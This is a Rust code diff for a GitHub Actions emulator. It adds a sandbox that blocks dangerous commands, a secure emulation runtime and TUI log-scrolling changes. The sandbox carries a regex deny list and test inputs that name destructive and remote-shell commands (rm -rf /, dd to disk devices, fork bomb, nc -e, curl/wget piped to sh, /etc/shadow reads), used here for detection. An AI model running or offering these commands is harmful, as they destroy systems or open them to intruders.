wrkflw_logging::info(&format!(
|
||||
"Created new sandbox with workspace: {}",
|
||||
workspace.path().display()
|
||||
));
|
||||
|
||||
Ok(Self {
|
||||
config,
|
||||
workspace,
|
||||
dangerous_patterns,
|
||||
})
|
||||
}
|
||||
|
||||
/// Execute a command in the sandbox
|
||||
pub async fn execute_command(
|
||||
&self,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
) -> Result<crate::container::ContainerOutput, SandboxError> {
|
||||
if command.is_empty() {
|
||||
return Err(SandboxError::ExecutionError {
|
||||
reason: "Empty command".to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
let command_str = command.join(" ");
|
||||
|
||||
// Step 1: Validate command
|
||||
self.validate_command(&command_str)?;
|
||||
|
||||
// Step 2: Setup sandbox environment
|
||||
let sandbox_dir = self.setup_sandbox_environment(working_dir)?;
|
||||
|
||||
// Step 3: Execute with limits
|
||||
self.execute_with_limits(command, env_vars, &sandbox_dir)
|
||||
.await
|
||||
}
|
||||
|
||||
/// Validate that a command is safe to execute.
///
/// Two passes over `command_str`:
/// 1. the whole line is matched against the compiled dangerous-pattern
///    regexes (rm -rf /, fork bombs, curl|sh, ...);
/// 2. the line is split on shell operators and each sub-command's base
///    name is checked against `blocked_commands` and — in strict mode —
///    against the `allowed_commands` whitelist.
///
/// Returns `Ok(())` when every part passes, otherwise `DangerousPattern`
/// or `BlockedCommand`.
fn validate_command(&self, command_str: &str) -> Result<(), SandboxError> {
    // Check for dangerous patterns first
    for pattern in &self.dangerous_patterns {
        if pattern.is_match(command_str) {
            wrkflw_logging::warning(&format!(
                "🚫 Blocked dangerous command pattern: {}",
                command_str
            ));
            return Err(SandboxError::DangerousPattern {
                pattern: command_str.to_string(),
            });
        }
    }

    // Split command by shell operators to validate each part
    let command_parts = self.split_shell_command(command_str);

    for part in command_parts {
        let part = part.trim();
        if part.is_empty() {
            continue;
        }

        // Extract the base command from this part
        let base_command = part.split_whitespace().next().unwrap_or("");
        // Strip any leading directory (e.g. /usr/bin/curl -> curl) so the
        // block/allow lists match the bare program name.
        let command_name = Path::new(base_command)
            .file_name()
            .and_then(|s| s.to_str())
            .unwrap_or(base_command);

        // Skip shell built-ins and operators
        if self.is_shell_builtin(command_name) {
            continue;
        }

        // Check blocked commands
        if self.config.blocked_commands.contains(command_name) {
            wrkflw_logging::warning(&format!("🚫 Blocked command: {}", command_name));
            return Err(SandboxError::BlockedCommand {
                command: command_name.to_string(),
            });
        }

        // In strict mode, only allow whitelisted commands
        if self.config.strict_mode && !self.config.allowed_commands.contains(command_name) {
            wrkflw_logging::warning(&format!(
                "🚫 Command not in whitelist (strict mode): {}",
                command_name
            ));
            return Err(SandboxError::BlockedCommand {
                command: command_name.to_string(),
            });
        }
    }

    wrkflw_logging::info(&format!("✅ Command validation passed: {}", command_str));
    Ok(())
}
|
||||
|
||||
/// Split shell command by operators while preserving quoted strings
|
||||
fn split_shell_command(&self, command_str: &str) -> Vec<String> {
|
||||
// Simple split by common shell operators
|
||||
// This is not a full shell parser but handles most cases
|
||||
let separators = ["&&", "||", ";", "|"];
|
||||
let mut parts = vec![command_str.to_string()];
|
||||
|
||||
for separator in separators {
|
||||
let mut new_parts = Vec::new();
|
||||
for part in parts {
|
||||
let split_parts: Vec<String> = part
|
||||
.split(separator)
|
||||
.map(|s| s.trim().to_string())
|
||||
.filter(|s| !s.is_empty())
|
||||
.collect();
|
||||
new_parts.extend(split_parts);
|
||||
}
|
||||
parts = new_parts;
|
||||
}
|
||||
|
||||
parts
|
||||
}
|
||||
|
||||
/// Check if a command is a shell built-in
|
||||
fn is_shell_builtin(&self, command: &str) -> bool {
|
||||
let builtins = [
|
||||
"true", "false", "test", "[", "echo", "printf", "cd", "pwd", "export", "set", "unset",
|
||||
"alias", "history", "jobs", "fg", "bg", "wait", "read",
|
||||
];
|
||||
builtins.contains(&command)
|
||||
}
|
||||
|
||||
/// Setup isolated sandbox environment.
///
/// Creates a `workspace` subdirectory under the sandbox temp root and,
/// when `working_dir` exists and passes the read-access check, copies its
/// safe files into it (see `copy_safe_files`). Returns the path commands
/// should run in.
fn setup_sandbox_environment(&self, working_dir: &Path) -> Result<PathBuf, SandboxError> {
    let sandbox_root = self.workspace.path();
    let sandbox_workspace = sandbox_root.join("workspace");

    // Create sandbox directory structure
    fs::create_dir_all(&sandbox_workspace).map_err(|e| SandboxError::SandboxSetupError {
        reason: format!("Failed to create sandbox workspace: {}", e),
    })?;

    // Copy allowed files to sandbox (if working_dir exists and is allowed)
    if working_dir.exists() && self.is_path_allowed(working_dir, false) {
        self.copy_safe_files(working_dir, &sandbox_workspace)?;
    }

    wrkflw_logging::info(&format!(
        "Sandbox environment ready: {}",
        sandbox_workspace.display()
    ));

    Ok(sandbox_workspace)
}
|
||||
|
||||
/// Copy files safely to sandbox, excluding dangerous files.
///
/// Recursively copies `source` into `dest`, skipping names flagged by
/// `should_skip_file` (credentials, dotfiles, ...) and directories flagged
/// by `should_skip_directory` (build artefacts, caches, VCS metadata).
///
/// NOTE(review): `is_file`/`is_dir` follow symlinks, so a symlink inside
/// `source` is copied as its target — confirm this is acceptable for
/// links pointing outside the workspace.
fn copy_safe_files(&self, source: &Path, dest: &Path) -> Result<(), SandboxError> {
    for entry in fs::read_dir(source).map_err(|e| SandboxError::SandboxSetupError {
        reason: format!("Failed to read source directory: {}", e),
    })? {
        let entry = entry.map_err(|e| SandboxError::SandboxSetupError {
            reason: format!("Failed to read directory entry: {}", e),
        })?;

        let path = entry.path();
        let file_name = path.file_name().and_then(|s| s.to_str()).unwrap_or("");

        // Skip dangerous or sensitive files
        if self.should_skip_file(file_name) {
            continue;
        }

        let dest_path = dest.join(file_name);

        if path.is_file() {
            fs::copy(&path, &dest_path).map_err(|e| SandboxError::SandboxSetupError {
                reason: format!("Failed to copy file: {}", e),
            })?;
        } else if path.is_dir() && !self.should_skip_directory(file_name) {
            fs::create_dir_all(&dest_path).map_err(|e| SandboxError::SandboxSetupError {
                reason: format!("Failed to create directory: {}", e),
            })?;
            // Recurse into allowed subdirectories.
            self.copy_safe_files(&path, &dest_path)?;
        }
    }

    Ok(())
}
|
||||
|
||||
/// Execute command with resource limits and monitoring
|
||||
async fn execute_with_limits(
|
||||
&self,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
) -> Result<crate::container::ContainerOutput, SandboxError> {
|
||||
// Join command parts and execute via shell for proper handling of operators
|
||||
let command_str = command.join(" ");
|
||||
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c");
|
||||
cmd.arg(&command_str);
|
||||
cmd.current_dir(working_dir);
|
||||
cmd.stdout(Stdio::piped());
|
||||
cmd.stderr(Stdio::piped());
|
||||
|
||||
// Set environment variables (filtered)
|
||||
for (key, value) in env_vars {
|
||||
if self.is_env_var_safe(key) {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
}
|
||||
|
||||
// Add sandbox-specific environment variables
|
||||
cmd.env("WRKFLW_SANDBOXED", "true");
|
||||
cmd.env("WRKFLW_SANDBOX_MODE", "strict");
|
||||
|
||||
// Execute with timeout
|
||||
let timeout_duration = self.config.max_execution_time;
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"🏃 Executing sandboxed command: {} (timeout: {}s)",
|
||||
command.join(" "),
|
||||
timeout_duration.as_secs()
|
||||
));
|
||||
|
||||
let start_time = std::time::Instant::now();
|
||||
|
||||
let result = tokio::time::timeout(timeout_duration, async {
|
||||
let output = cmd.output().map_err(|e| SandboxError::ExecutionError {
|
||||
reason: format!("Command execution failed: {}", e),
|
||||
})?;
|
||||
|
||||
Ok(crate::container::ContainerOutput {
|
||||
stdout: String::from_utf8_lossy(&output.stdout).to_string(),
|
||||
stderr: String::from_utf8_lossy(&output.stderr).to_string(),
|
||||
exit_code: output.status.code().unwrap_or(-1),
|
||||
})
|
||||
})
|
||||
.await;
|
||||
|
||||
let execution_time = start_time.elapsed();
|
||||
|
||||
match result {
|
||||
Ok(output_result) => {
|
||||
wrkflw_logging::info(&format!(
|
||||
"✅ Sandboxed command completed in {:.2}s",
|
||||
execution_time.as_secs_f64()
|
||||
));
|
||||
output_result
|
||||
}
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"⏰ Sandboxed command timed out after {:.2}s",
|
||||
timeout_duration.as_secs_f64()
|
||||
));
|
||||
Err(SandboxError::ExecutionTimeout {
|
||||
seconds: timeout_duration.as_secs(),
|
||||
})
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if a path is allowed for access
|
||||
fn is_path_allowed(&self, path: &Path, write_access: bool) -> bool {
|
||||
let abs_path = path.canonicalize().unwrap_or_else(|_| path.to_path_buf());
|
||||
|
||||
if write_access {
|
||||
self.config
|
||||
.allowed_write_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
} else {
|
||||
self.config
|
||||
.allowed_read_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
|| self
|
||||
.config
|
||||
.allowed_write_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if an environment variable is safe to pass through
|
||||
fn is_env_var_safe(&self, key: &str) -> bool {
|
||||
// Block dangerous environment variables
|
||||
let dangerous_env_vars = [
|
||||
"LD_PRELOAD",
|
||||
"LD_LIBRARY_PATH",
|
||||
"DYLD_INSERT_LIBRARIES",
|
||||
"DYLD_LIBRARY_PATH",
|
||||
"PATH",
|
||||
"HOME",
|
||||
"SHELL",
|
||||
];
|
||||
|
||||
!dangerous_env_vars.contains(&key)
|
||||
}
|
||||
|
||||
/// Check if a file should be skipped during copying.
///
/// A name is skipped when it contains any deny-list entry as a substring
/// — note this is deliberately broad: any name containing "config" or
/// "credentials" (e.g. "webpack.config.js") is skipped — or when it is a
/// dotfile other than the explicitly allowed ".gitignore" / ".github".
fn should_skip_file(&self, filename: &str) -> bool {
    let dangerous_files = [
        ".ssh",
        ".gnupg",
        ".aws",
        ".docker",
        "id_rsa",
        "id_ed25519",
        "credentials",
        "config",
        ".env",
        ".secrets",
    ];

    // `&&` binds tighter than `||`: the dotfile exemption only applies to
    // the second operand, not to the substring deny-list match.
    dangerous_files
        .iter()
        .any(|pattern| filename.contains(pattern))
        || filename.starts_with('.') && filename != ".gitignore" && filename != ".github"
}
|
||||
|
||||
/// Check if a directory should be skipped
|
||||
fn should_skip_directory(&self, dirname: &str) -> bool {
|
||||
let skip_dirs = [
|
||||
"target",
|
||||
"node_modules",
|
||||
".git",
|
||||
".cargo",
|
||||
".npm",
|
||||
".cache",
|
||||
"build",
|
||||
"dist",
|
||||
"tmp",
|
||||
"temp",
|
||||
];
|
||||
|
||||
skip_dirs.contains(&dirname)
|
||||
}
|
||||
|
||||
/// Compile regex patterns for dangerous command detection
|
||||
fn compile_dangerous_patterns() -> Vec<Regex> {
|
||||
let patterns = [
|
||||
r"rm\s+.*-rf?\s*/", // rm -rf /
|
||||
r"dd\s+.*of=/dev/", // dd ... of=/dev/...
|
||||
r">\s*/dev/sd[a-z]", // > /dev/sda
|
||||
r"mkfs\.", // mkfs.ext4, etc.
|
||||
r"fdisk\s+/dev/", // fdisk /dev/...
|
||||
r"mount\s+.*\s+/", // mount ... /
|
||||
r"chroot\s+/", // chroot /
|
||||
r"sudo\s+", // sudo commands
|
||||
r"su\s+", // su commands
|
||||
r"bash\s+-c\s+.*rm.*-rf", // bash -c "rm -rf ..."
|
||||
r"sh\s+-c\s+.*rm.*-rf", // sh -c "rm -rf ..."
|
||||
r"eval\s+.*rm.*-rf", // eval "rm -rf ..."
|
||||
r":\(\)\{.*;\};:", // Fork bomb
|
||||
r"/proc/sys/", // /proc/sys access
|
||||
r"/etc/passwd", // /etc/passwd access
|
||||
r"/etc/shadow", // /etc/shadow access
|
||||
r"nc\s+.*-e", // netcat with exec
|
||||
r"wget\s+.*\|\s*sh", // wget ... | sh
|
||||
r"curl\s+.*\|\s*sh", // curl ... | sh
|
||||
];
|
||||
|
||||
patterns
|
||||
.iter()
|
||||
.filter_map(|pattern| {
|
||||
Regex::new(pattern)
|
||||
.map_err(|e| {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Invalid regex pattern {}: {}",
|
||||
pattern, e
|
||||
));
|
||||
e
|
||||
})
|
||||
.ok()
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a default sandbox configuration for CI/CD workflows
|
||||
pub fn create_workflow_sandbox_config() -> SandboxConfig {
|
||||
let mut allowed_read_paths = HashSet::new();
|
||||
allowed_read_paths.insert(PathBuf::from("."));
|
||||
|
||||
let mut allowed_write_paths = HashSet::new();
|
||||
allowed_write_paths.insert(PathBuf::from("."));
|
||||
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(1800), // 30 minutes
|
||||
max_memory_mb: 2048, // 2GB
|
||||
max_processes: 50,
|
||||
allow_network: true,
|
||||
strict_mode: false,
|
||||
allowed_read_paths,
|
||||
allowed_write_paths,
|
||||
..Default::default()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a strict sandbox configuration for untrusted code
|
||||
pub fn create_strict_sandbox_config() -> SandboxConfig {
|
||||
let mut allowed_read_paths = HashSet::new();
|
||||
allowed_read_paths.insert(PathBuf::from("."));
|
||||
|
||||
let mut allowed_write_paths = HashSet::new();
|
||||
allowed_write_paths.insert(PathBuf::from("."));
|
||||
|
||||
// Very limited command set
|
||||
let allowed_commands = ["echo", "cat", "ls", "pwd", "date"]
|
||||
.iter()
|
||||
.map(|s| s.to_string())
|
||||
.collect();
|
||||
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(60), // 1 minute
|
||||
max_memory_mb: 128, // 128MB
|
||||
max_processes: 5,
|
||||
allow_network: false,
|
||||
strict_mode: true,
|
||||
allowed_read_paths,
|
||||
allowed_write_paths,
|
||||
allowed_commands,
|
||||
..Default::default()
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
mod tests {
    use super::*;

    // Dangerous command lines must be rejected at validation time while
    // ordinary build/inspection commands pass in the default (non-strict)
    // configuration.
    #[test]
    fn test_dangerous_pattern_detection() {
        let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();

        // Should block dangerous commands
        assert!(sandbox.validate_command("rm -rf /").is_err());
        assert!(sandbox
            .validate_command("dd if=/dev/zero of=/dev/sda")
            .is_err());
        assert!(sandbox.validate_command("sudo rm -rf /home").is_err());
        assert!(sandbox.validate_command("bash -c 'rm -rf /'").is_err());

        // Should allow safe commands
        assert!(sandbox.validate_command("echo hello").is_ok());
        assert!(sandbox.validate_command("ls -la").is_ok());
        assert!(sandbox.validate_command("cargo build").is_ok());
    }

    // In strict mode only whitelisted commands (see
    // create_strict_sandbox_config) may run.
    #[test]
    fn test_command_whitelist() {
        let config = create_strict_sandbox_config();
        let sandbox = Sandbox::new(config).unwrap();

        // Should allow whitelisted commands
        assert!(sandbox.validate_command("echo hello").is_ok());
        assert!(sandbox.validate_command("ls").is_ok());

        // Should block non-whitelisted commands
        assert!(sandbox.validate_command("git clone").is_err());
        assert!(sandbox.validate_command("cargo build").is_err());
    }

    // Sensitive files are excluded from workspace copies; ordinary project
    // files and the explicitly exempt .gitignore are kept.
    #[test]
    fn test_file_filtering() {
        let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();

        // Should skip dangerous files
        assert!(sandbox.should_skip_file("id_rsa"));
        assert!(sandbox.should_skip_file(".ssh"));
        assert!(sandbox.should_skip_file("credentials"));

        // Should allow safe files
        assert!(!sandbox.should_skip_file("Cargo.toml"));
        assert!(!sandbox.should_skip_file("README.md"));
        assert!(!sandbox.should_skip_file(".gitignore"));
    }
}
|
||||
339
crates/runtime/src/secure_emulation.rs
Normal file
339
crates/runtime/src/secure_emulation.rs
Normal file
@@ -0,0 +1,339 @@
|
||||
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use crate::sandbox::{create_workflow_sandbox_config, Sandbox, SandboxConfig, SandboxError};
|
||||
use async_trait::async_trait;
|
||||
use std::path::Path;
|
||||
use wrkflw_logging;
|
||||
|
||||
/// Secure emulation runtime that uses sandboxing for safety
pub struct SecureEmulationRuntime {
    // All command execution is delegated to this sandbox; the temp
    // workspace it owns lives as long as the runtime.
    sandbox: Sandbox,
}
|
||||
|
||||
// `Default` delegates to `new()`, i.e. the workflow-friendly sandbox
// configuration. Note `new()` panics if sandbox setup fails.
impl Default for SecureEmulationRuntime {
    fn default() -> Self {
        Self::new()
    }
}
|
||||
|
||||
impl SecureEmulationRuntime {
    /// Create a new secure emulation runtime with default workflow-friendly configuration
    ///
    /// NOTE(review): panics (via `expect`) if the sandbox temp workspace
    /// cannot be created; callers needing a fallible path should use
    /// `new_with_config` instead.
    pub fn new() -> Self {
        let config = create_workflow_sandbox_config();
        let sandbox = Sandbox::new(config).expect("Failed to create sandbox");

        wrkflw_logging::info("🔒 Initialized secure emulation runtime with sandboxing");

        Self { sandbox }
    }

    /// Create a new secure emulation runtime with custom sandbox configuration
    ///
    /// Sandbox setup failures are surfaced as `ContainerError::ContainerStart`.
    pub fn new_with_config(config: SandboxConfig) -> Result<Self, ContainerError> {
        let sandbox = Sandbox::new(config).map_err(|e| {
            ContainerError::ContainerStart(format!("Failed to create sandbox: {}", e))
        })?;

        wrkflw_logging::info("🔒 Initialized secure emulation runtime with custom config");

        Ok(Self { sandbox })
    }
}
|
||||
|
||||
#[async_trait]
|
||||
impl ContainerRuntime for SecureEmulationRuntime {
|
||||
/// Run a "container" by executing the command in the local sandbox.
///
/// The `image` is informational only and `_volumes` are ignored — nothing
/// is actually containerized. Each `SandboxError` variant is translated
/// into a `ContainerError::ContainerExecution` with a user-facing
/// explanation.
async fn run_container(
    &self,
    image: &str,
    command: &[&str],
    env_vars: &[(&str, &str)],
    working_dir: &Path,
    _volumes: &[(&Path, &Path)],
) -> Result<ContainerOutput, ContainerError> {
    wrkflw_logging::info(&format!(
        "🔒 Executing sandboxed command: {} (image: {})",
        command.join(" "),
        image
    ));

    // Use sandbox to execute the command safely
    let result = self
        .sandbox
        .execute_command(command, env_vars, working_dir)
        .await;

    match result {
        Ok(output) => {
            wrkflw_logging::info("✅ Sandboxed command completed successfully");
            Ok(output)
        }
        // Command rejected by block-list / strict whitelist.
        Err(SandboxError::BlockedCommand { command }) => {
            let error_msg = format!(
                "🚫 SECURITY BLOCK: Command '{}' is not allowed in secure emulation mode. \
                 This command was blocked for security reasons. \
                 If you need to run this command, please use Docker or Podman mode instead.",
                command
            );
            wrkflw_logging::warning(&error_msg);
            Err(ContainerError::ContainerExecution(error_msg))
        }
        // Command line matched one of the dangerous-pattern regexes.
        Err(SandboxError::DangerousPattern { pattern }) => {
            let error_msg = format!(
                "🚫 SECURITY BLOCK: Dangerous command pattern detected: '{}'. \
                 This command was blocked because it matches a known dangerous pattern. \
                 Please review your workflow for potentially harmful commands.",
                pattern
            );
            wrkflw_logging::warning(&error_msg);
            Err(ContainerError::ContainerExecution(error_msg))
        }
        Err(SandboxError::ExecutionTimeout { seconds }) => {
            let error_msg = format!(
                "⏰ Command execution timed out after {} seconds. \
                 Consider optimizing your command or increasing timeout limits.",
                seconds
            );
            wrkflw_logging::warning(&error_msg);
            Err(ContainerError::ContainerExecution(error_msg))
        }
        Err(SandboxError::PathAccessDenied { path }) => {
            let error_msg = format!(
                "🚫 Path access denied: '{}'. \
                 The sandbox restricts file system access for security.",
                path
            );
            wrkflw_logging::warning(&error_msg);
            Err(ContainerError::ContainerExecution(error_msg))
        }
        Err(SandboxError::ResourceLimitExceeded { resource }) => {
            let error_msg = format!(
                "📊 Resource limit exceeded: {}. \
                 Your command used too many system resources.",
                resource
            );
            wrkflw_logging::warning(&error_msg);
            Err(ContainerError::ContainerExecution(error_msg))
        }
        // Remaining variants (setup/execution failures) — logged as errors.
        Err(e) => {
            let error_msg = format!("Sandbox execution failed: {}", e);
            wrkflw_logging::error(&error_msg);
            Err(ContainerError::ContainerExecution(error_msg))
        }
    }
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to pull image {}",
|
||||
image
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to build image {} from {}",
|
||||
tag,
|
||||
dockerfile.display()
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn prepare_language_environment(
|
||||
&self,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
_additional_packages: Option<Vec<String>>,
|
||||
) -> Result<String, ContainerError> {
|
||||
// For secure emulation runtime, we'll use a simplified approach
|
||||
// that doesn't require building custom images
|
||||
let base_image = match language {
|
||||
"python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
|
||||
"node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
|
||||
"java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
|
||||
format!("eclipse-temurin:{}", v)
|
||||
}),
|
||||
"go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
|
||||
"dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
|
||||
format!("mcr.microsoft.com/dotnet/sdk:{}", v)
|
||||
}),
|
||||
"rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
|
||||
_ => {
|
||||
return Err(ContainerError::ContainerStart(format!(
|
||||
"Unsupported language: {}",
|
||||
language
|
||||
)))
|
||||
}
|
||||
};
|
||||
|
||||
// For emulation, we'll just return the base image
|
||||
// The actual package installation will be handled during container execution
|
||||
Ok(base_image)
|
||||
}
|
||||
}
|
||||
|
||||
/// Handle special actions in secure emulation mode.
///
/// Parses `owner/repo@version` (version defaults to "latest") and routes
/// known action prefixes: checkout/setup actions map to system-tool
/// availability checks; docker/ssh/deploy actions are warned as
/// unsupported; everything else gets a generic limited-support warning.
/// Always returns `Ok(())` — warnings are informational only.
pub async fn handle_special_action_secure(action: &str) -> Result<(), ContainerError> {
    // Extract owner, repo and version from the action
    let action_parts: Vec<&str> = action.split('@').collect();
    let action_name = action_parts[0];
    let action_version = if action_parts.len() > 1 {
        action_parts[1]
    } else {
        "latest"
    };

    wrkflw_logging::info(&format!(
        "🔒 Processing action in secure mode: {} @ {}",
        action_name, action_version
    ));

    // In secure mode, we're more restrictive about what actions we allow
    match action_name {
        // Core GitHub actions that are generally safe
        name if name.starts_with("actions/checkout") => {
            wrkflw_logging::info("✅ Checkout action - workspace files are prepared securely");
        }
        name if name.starts_with("actions/setup-node") => {
            wrkflw_logging::info("🟡 Node.js setup - using system Node.js in secure mode");
            check_command_available_secure("node", "Node.js", "https://nodejs.org/");
        }
        name if name.starts_with("actions/setup-python") => {
            wrkflw_logging::info("🟡 Python setup - using system Python in secure mode");
            check_command_available_secure("python", "Python", "https://www.python.org/downloads/");
        }
        name if name.starts_with("actions/setup-java") => {
            wrkflw_logging::info("🟡 Java setup - using system Java in secure mode");
            check_command_available_secure("java", "Java", "https://adoptium.net/");
        }
        name if name.starts_with("actions/cache") => {
            wrkflw_logging::info("🟡 Cache action - caching disabled in secure emulation mode");
        }

        // Rust-specific actions
        name if name.starts_with("actions-rs/cargo") => {
            wrkflw_logging::info("🟡 Rust cargo action - using system Rust in secure mode");
            check_command_available_secure("cargo", "Rust/Cargo", "https://rustup.rs/");
        }
        name if name.starts_with("actions-rs/toolchain") => {
            wrkflw_logging::info("🟡 Rust toolchain action - using system Rust in secure mode");
            check_command_available_secure("rustc", "Rust", "https://rustup.rs/");
        }
        name if name.starts_with("actions-rs/fmt") => {
            wrkflw_logging::info("🟡 Rust formatter action - using system rustfmt in secure mode");
            check_command_available_secure("rustfmt", "rustfmt", "rustup component add rustfmt");
        }

        // Potentially dangerous actions that we warn about
        name if name.contains("docker") || name.contains("container") => {
            wrkflw_logging::warning(&format!(
                "🚫 Docker/container action '{}' is not supported in secure emulation mode. \
                 Use Docker or Podman mode for container actions.",
                action_name
            ));
        }
        name if name.contains("ssh") || name.contains("deploy") => {
            wrkflw_logging::warning(&format!(
                "🚫 SSH/deployment action '{}' is restricted in secure emulation mode. \
                 Use Docker or Podman mode for deployment actions.",
                action_name
            ));
        }

        // Unknown actions
        _ => {
            wrkflw_logging::warning(&format!(
                "🟡 Unknown action '{}' in secure emulation mode. \
                 Some functionality may be limited or unavailable.",
                action_name
            ));
        }
    }

    Ok(())
}
|
||||
|
||||
/// Check if a command is available, with security-focused messaging
|
||||
fn check_command_available_secure(command: &str, name: &str, install_url: &str) {
|
||||
use std::process::Command;
|
||||
|
||||
let is_available = Command::new("which")
|
||||
.arg(command)
|
||||
.output()
|
||||
.map(|output| output.status.success())
|
||||
.unwrap_or(false);
|
||||
|
||||
if !is_available {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🔧 {} is required but not found on the system",
|
||||
name
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"To use this action in secure mode, please install {}: {}",
|
||||
name, install_url
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Alternatively, use Docker or Podman mode for automatic {} installation",
|
||||
name
|
||||
));
|
||||
} else {
|
||||
// Try to get version information
|
||||
if let Ok(output) = Command::new(command).arg("--version").output() {
|
||||
if output.status.success() {
|
||||
let version = String::from_utf8_lossy(&output.stdout);
|
||||
wrkflw_logging::info(&format!(
|
||||
"✅ Using system {} in secure mode: {}",
|
||||
name,
|
||||
version.trim()
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
mod tests {
    use super::*;
    use crate::sandbox::create_strict_sandbox_config;
    use std::path::PathBuf;

    // A destructive command must be rejected before execution and surface
    // the "SECURITY BLOCK" message through ContainerError.
    #[tokio::test]
    async fn test_secure_emulation_blocks_dangerous_commands() {
        let config = create_strict_sandbox_config();
        let runtime = SecureEmulationRuntime::new_with_config(config).unwrap();

        // Should block dangerous commands
        let result = runtime
            .run_container(
                "alpine:latest",
                &["rm", "-rf", "/"],
                &[],
                &PathBuf::from("."),
                &[],
            )
            .await;

        assert!(result.is_err());
        let error_msg = result.unwrap_err().to_string();
        assert!(error_msg.contains("SECURITY BLOCK"));
    }

    // A benign echo runs to completion in the default (workflow) sandbox
    // and its stdout/exit code are passed through.
    #[tokio::test]
    async fn test_secure_emulation_allows_safe_commands() {
        let runtime = SecureEmulationRuntime::new();

        // Should allow safe commands
        let result = runtime
            .run_container(
                "alpine:latest",
                &["echo", "hello world"],
                &[],
                &PathBuf::from("."),
                &[],
            )
            .await;

        assert!(result.is_ok());
        let output = result.unwrap();
        assert!(output.stdout.contains("hello world"));
        assert_eq!(output.exit_code, 0);
    }
}
|
||||
@@ -12,12 +12,12 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.6.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.6.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.6.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.6.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
chrono.workspace = true
|
||||
|
||||
@@ -154,6 +154,15 @@ fn run_tui_event_loop(
|
||||
if last_tick.elapsed() >= tick_rate {
|
||||
app.tick();
|
||||
app.update_running_workflow_progress();
|
||||
|
||||
// Check for log processing updates (includes system log change detection)
|
||||
app.check_log_processing_updates();
|
||||
|
||||
// Request log processing if needed
|
||||
if app.logs_need_update {
|
||||
app.request_log_processing_update();
|
||||
}
|
||||
|
||||
last_tick = Instant::now();
|
||||
}
|
||||
|
||||
@@ -180,6 +189,25 @@ fn run_tui_event_loop(
|
||||
continue;
|
||||
}
|
||||
|
||||
// Handle help overlay scrolling
|
||||
if app.show_help {
|
||||
match key.code {
|
||||
KeyCode::Up | KeyCode::Char('k') => {
|
||||
app.scroll_help_up();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Down | KeyCode::Char('j') => {
|
||||
app.scroll_help_down();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Esc | KeyCode::Char('?') => {
|
||||
app.show_help = false;
|
||||
continue;
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
match key.code {
|
||||
KeyCode::Char('q') => {
|
||||
// Exit and clean up
|
||||
@@ -214,6 +242,8 @@ fn run_tui_event_loop(
|
||||
} else {
|
||||
app.scroll_logs_up();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_up();
|
||||
} else if app.selected_tab == 0 {
|
||||
app.previous_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
@@ -231,6 +261,8 @@ fn run_tui_event_loop(
|
||||
} else {
|
||||
app.scroll_logs_down();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_down();
|
||||
